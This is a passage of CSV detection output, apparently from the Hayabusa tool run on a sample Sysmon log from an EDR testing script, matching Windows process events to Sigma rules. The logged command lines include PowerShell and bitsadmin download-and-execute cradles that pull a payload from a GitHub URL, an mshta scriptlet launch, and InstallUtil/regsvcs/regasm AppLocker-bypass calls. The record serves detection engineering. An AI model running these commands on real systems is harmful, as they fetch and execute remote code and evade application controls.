747F3D96-660F-5D3F-0000-00109B328600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:33:03.254 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd /c powershell -c ""Start-BitsTransfer -Priority foreground -Source https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt -Destination Default_File_Path.ps1 | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 2948 | PGUID: 747F3D96-660F-5D3F-0000-001055378600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:33:03.254 +09:00,MSEDGEWIN10,1,medium,Exec,Windows Suspicious Use Of Web Request in CommandLine,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_web_request_cmd.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:33:03.886 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: bitsadmin.exe /transfer ""JobName"" https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt ""C:\Windows\system32\Default_File_Path.ps1"" | Process: C:\Windows\System32\bitsadmin.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: cmd /c bitsadmin.exe /transfer ""JobName"" https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt ""C:\Windows\system32\Default_File_Path.ps1"" | LID: 0x413182 | PID: 3896 | PGUID: 747F3D96-660F-5D3F-0000-00100F4F8600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:33:03.886 +09:00,MSEDGEWIN10,1,medium,Evas | Persis,Bitsadmin Download,,../hayabusa-rules/sigma/process_creation/proc_creation_win_bitsadmin_download.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:33:03.966 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: powershell -c ""Start-BitsTransfer -Priority foreground -Source https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt -Destination Default_File_Path.ps1 | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: cmd /c powershell -c ""Start-BitsTransfer -Priority foreground -Source https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt -Destination Default_File_Path.ps1 | LID: 0x413182 | PID: 6720 | PGUID: 747F3D96-660F-5D3F-0000-00106B508600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:33:03.966 +09:00,MSEDGEWIN10,1,low,Exec,Non Interactive PowerShell,,../hayabusa-rules/sigma/process_creation/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:33:03.966 +09:00,MSEDGEWIN10,1,medium,Exec,Windows Suspicious Use Of Web Request in CommandLine,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_web_request_cmd.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:33:03.966 +09:00,MSEDGEWIN10,1,high,Evas | Persis,Suspicious Bitsadmin Job via PowerShell,,../hayabusa-rules/sigma/process_creation/proc_creation_win_powershell_bitsjob.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:33:04.008 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: timeout 5 | Process: C:\Windows\System32\timeout.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 3756 | PGUID: 747F3D96-660F-5D3F-0000-00104D5B8600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:33:08.202 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd /c C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 108 | PGUID: 747F3D96-6614-5D3F-0000-001093CE8600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:33:08.202 +09:00,MSEDGEWIN10,1,low,Evas,Possible Applocker Bypass,,../hayabusa-rules/sigma/process_creation/proc_creation_win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:33:08.318 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: timeout 5 | Process: C:\Windows\System32\timeout.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 7156 | PGUID: 747F3D96-6614-5D3F-0000-00104ED38600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:33:08.446 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: cmd /c C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll | LID: 0x413182 | PID: 5696 | PGUID: 747F3D96-6614-5D3F-0000-0010BFD98600,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:33:08.446 +09:00,MSEDGEWIN10,1,medium,Evas,Suspicious Execution of InstallUtil Without Log,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_instalutil.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:33:08.446 +09:00,MSEDGEWIN10,1,low,Evas,Possible Applocker Bypass,,../hayabusa-rules/sigma/process_creation/proc_creation_win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:33:13.214 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd /c C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 5116 | PGUID: 747F3D96-6619-5D3F-0000-0010FDE78600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:33:13.214 +09:00,MSEDGEWIN10,1,low,Evas,Possible Applocker Bypass,,../hayabusa-rules/sigma/process_creation/proc_creation_win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:33:13.225 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: timeout 5 | Process: C:\Windows\System32\timeout.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 3224 | PGUID: 747F3D96-6619-5D3F-0000-0010BEE98600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:33:18.286 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd /c mshta.exe javascript:a=GetObject(""script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Mshta_calc.sct"").Exec();close(); | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 776 | PGUID: 747F3D96-661E-5D3F-0000-0010A3148700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:33:18.310 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: timeout 5 | Process: C:\Windows\System32\timeout.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 6756 | PGUID: 747F3D96-661E-5D3F-0000-00103F168700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:33:18.583 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: mshta.exe javascript:a=GetObject(""script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Mshta_calc.sct"").Exec();close(); | Process: C:\Windows\System32\mshta.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: cmd /c mshta.exe javascript:a=GetObject(""script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Mshta_calc.sct"").Exec();close(); | LID: 0x413182 | PID: 3164 | PGUID: 747F3D96-661E-5D3F-0000-00107F248700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:33:18.583 +09:00,MSEDGEWIN10,1,high,Exec,Suspicious MSHTA Process Patterns,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_mshta_pattern.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:33:18.583 +09:00,MSEDGEWIN10,1,high,Evas | Exec,MSHTA Suspicious Execution 01,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_mshta_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:33:18.583 +09:00,MSEDGEWIN10,1,high,Evas,Mshta JavaScript Execution,,../hayabusa-rules/sigma/process_creation/proc_creation_win_mshta_javascript.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:33:20.186 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\System32\calc.exe"" | Process: C:\Windows\System32\calc.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: mshta.exe javascript:a=GetObject(""script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Mshta_calc.sct"").Exec();close(); | LID: 0x413182 | PID: 404 | PGUID: 747F3D96-6620-5D3F-0000-0010C7798700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:33:20.711 +09:00,MSEDGEWIN10,3,medium,,Network Connection_Sysmon Alert,Suspicious NetCon | tcp | Src: 10.0.2.15:49826 (MSEDGEWIN10.home) | Dst: 151.101.0.133:443 () | User: MSEDGEWIN10\IEUser | Process: C:\Windows\System32\mshta.exe | PID: 3164 | PGUID: 747F3D96-661E-5D3F-0000-00107F248700,../hayabusa-rules/hayabusa/sysmon/alerts/3_NetworkConnection_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:33:20.711 +09:00,MSEDGEWIN10,3,medium,,Network Connection_Sysmon Alert,Suspicious NetCon | tcp | Src: 10.0.2.15:49827 (MSEDGEWIN10.home) | Dst: 93.184.220.29:80 () | User: MSEDGEWIN10\IEUser | Process: C:\Windows\System32\mshta.exe | PID: 3164 | PGUID: 747F3D96-661E-5D3F-0000-00107F248700,../hayabusa-rules/hayabusa/sysmon/alerts/3_NetworkConnection_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:33:21.567 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k LocalService -p -s BthAvctpSvc | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e5 | PID: 1356 | PGUID: 747F3D96-6621-5D3F-0000-001071D28700,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:33:23.215 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd /c powershell -c ""(New-Object Net.WebClient).DownloadFile('https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt','Default_File_Path.ps1');IEX((-Join([IO.File]::ReadAllBytes('Default_File_Path.ps1')|ForEach-Object{[Char]$_})))"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 5816 | PGUID: 747F3D96-6623-5D3F-0000-001011F68700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:33:23.215 +09:00,MSEDGEWIN10,1,medium,Exec,Windows Suspicious Use Of Web Request in CommandLine,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_web_request_cmd.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:33:23.232 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: timeout 5 | Process: C:\Windows\System32\timeout.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 6156 | PGUID: 747F3D96-6623-5D3F-0000-0010CBF78700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:33:23.507 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: powershell -c ""(New-Object Net.WebClient).DownloadFile('https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt','Default_File_Path.ps1');IEX((-Join([IO.File]::ReadAllBytes('Default_File_Path.ps1')|ForEach-Object{[Char]$_})))"" | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: cmd /c powershell -c ""(New-Object Net.WebClient).DownloadFile('https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt','Default_File_Path.ps1');IEX((-Join([IO.File]::ReadAllBytes('Default_File_Path.ps1')|ForEach-Object{[Char]$_})))"" | LID: 0x413182 | PID: 3000 | PGUID: 747F3D96-6623-5D3F-0000-0010BC068800",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:33:23.507 +09:00,MSEDGEWIN10,1,medium,Evas | Exec,Encoded PowerShell Command Line,,../hayabusa-rules/sigma/process_creation/proc_creation_win_powershell_cmdline_specific_comb_methods.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:33:23.507 +09:00,MSEDGEWIN10,1,medium,Exec,PowerShell Download from URL,,../hayabusa-rules/sigma/process_creation/proc_creation_win_powershell_download.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:33:23.507 +09:00,MSEDGEWIN10,1,low,Exec,Non Interactive PowerShell,,../hayabusa-rules/sigma/process_creation/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:33:23.507 +09:00,MSEDGEWIN10,1,medium,Exec,Windows Suspicious Use Of Web Request in CommandLine,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_web_request_cmd.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:33:23.507 +09:00,MSEDGEWIN10,1,medium,Evas,Suspicious XOR Encoded PowerShell Command Line,,../hayabusa-rules/sigma/process_creation/proc_creation_win_powershell_xor_commandline.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:33:24.104 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\System32\Default_File_Path.ps1 | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 3000 | PGUID: 747F3D96-6623-5D3F-0000-0010BC068800,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:33:24.563 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\System32\calc.exe"" | Process: C:\Windows\System32\calc.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell -c ""(New-Object Net.WebClient).DownloadFile('https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt','Default_File_Path.ps1');IEX((-Join([IO.File]::ReadAllBytes('Default_File_Path.ps1')|ForEach-Object{[Char]$_})))"" | LID: 0x413182 | PID: 1176 | PGUID: 747F3D96-6624-5D3F-0000-0010E8358800",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:33:25.202 +09:00,MSEDGEWIN10,3,medium,,Network Connection_Sysmon Alert,Suspicious NetCon | tcp | Src: 10.0.2.15:49828 (MSEDGEWIN10.home) | Dst: 151.101.0.133:443 () | User: MSEDGEWIN10\IEUser | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 3000 | PGUID: 747F3D96-6623-5D3F-0000-0010BC068800,../hayabusa-rules/hayabusa/sysmon/alerts/3_NetworkConnection_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:33:25.202 +09:00,MSEDGEWIN10,3,low,Exec,PowerShell Network Connections,,../hayabusa-rules/sigma/network_connection/sysmon_powershell_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:33:28.250 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd /c C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe AllTheThings.dll | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 1296 | PGUID: 747F3D96-6628-5D3F-0000-001067768800",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:33:28.250 +09:00,MSEDGEWIN10,1,low,Evas,Possible Applocker Bypass,,../hayabusa-rules/sigma/process_creation/proc_creation_win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:33:28.374 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd /c C:\Windows\Microsoft.NET\Framework\v2.0.50727\regsvcs.exe AllTheThings.dll | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 2040 | PGUID: 747F3D96-6628-5D3F-0000-001062788800",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:33:28.374 +09:00,MSEDGEWIN10,1,low,Evas,Possible Applocker Bypass,,../hayabusa-rules/sigma/process_creation/proc_creation_win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:33:29.341 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe AllTheThings.dll | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: cmd /c C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe AllTheThings.dll | LID: 0x413182 | PID: 4860 | PGUID: 747F3D96-6628-5D3F-0000-00105B918800,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:33:29.341 +09:00,MSEDGEWIN10,1,low,Evas,Possible Applocker Bypass,,../hayabusa-rules/sigma/process_creation/proc_creation_win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:33:29.565 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd /c C:\Windows\Microsoft.NET\Framework64\v2.0.50727\regsvcs.exe AllTheThings.dll | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 5708 | PGUID: 747F3D96-6628-5D3F-0000-0010B1968800",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:33:29.565 +09:00,MSEDGEWIN10,1,low,Evas,Possible Applocker Bypass,,../hayabusa-rules/sigma/process_creation/proc_creation_win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:33:29.646 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd /c C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regsvcs.exe AllTheThings.dll | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 6552 | PGUID: 747F3D96-6628-5D3F-0000-0010349B8800",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:33:29.646 +09:00,MSEDGEWIN10,1,low,Evas,Possible Applocker Bypass,,../hayabusa-rules/sigma/process_creation/proc_creation_win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:33:30.074 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: timeout 5 | Process: C:\Windows\System32\timeout.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 4564 | PGUID: 747F3D96-6629-5D3F-0000-0010C0BE8800",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:33:34.295 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd /c C:\Windows\Microsoft.NET\Framework\v2.0.50727\regasm.exe /U AllTheThings.dll | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 6020 | PGUID: 747F3D96-662E-5D3F-0000-001011038900",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:33:34.295 +09:00,MSEDGEWIN10,1,low,Evas,Possible Applocker Bypass,,../hayabusa-rules/sigma/process_creation/proc_creation_win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:33:34.411 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd /c C:\Windows\Microsoft.NET\Framework64\v2.0.50727\regasm.exe /U AllTheThings.dll | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 1976 | PGUID: 747F3D96-662E-5D3F-0000-0010C2048900",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:33:34.411 +09:00,MSEDGEWIN10,1,low,Evas,Possible Applocker Bypass,,../hayabusa-rules/sigma/process_creation/proc_creation_win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:33:34.483 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: timeout 5 | Process: C:\Windows\System32\timeout.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: 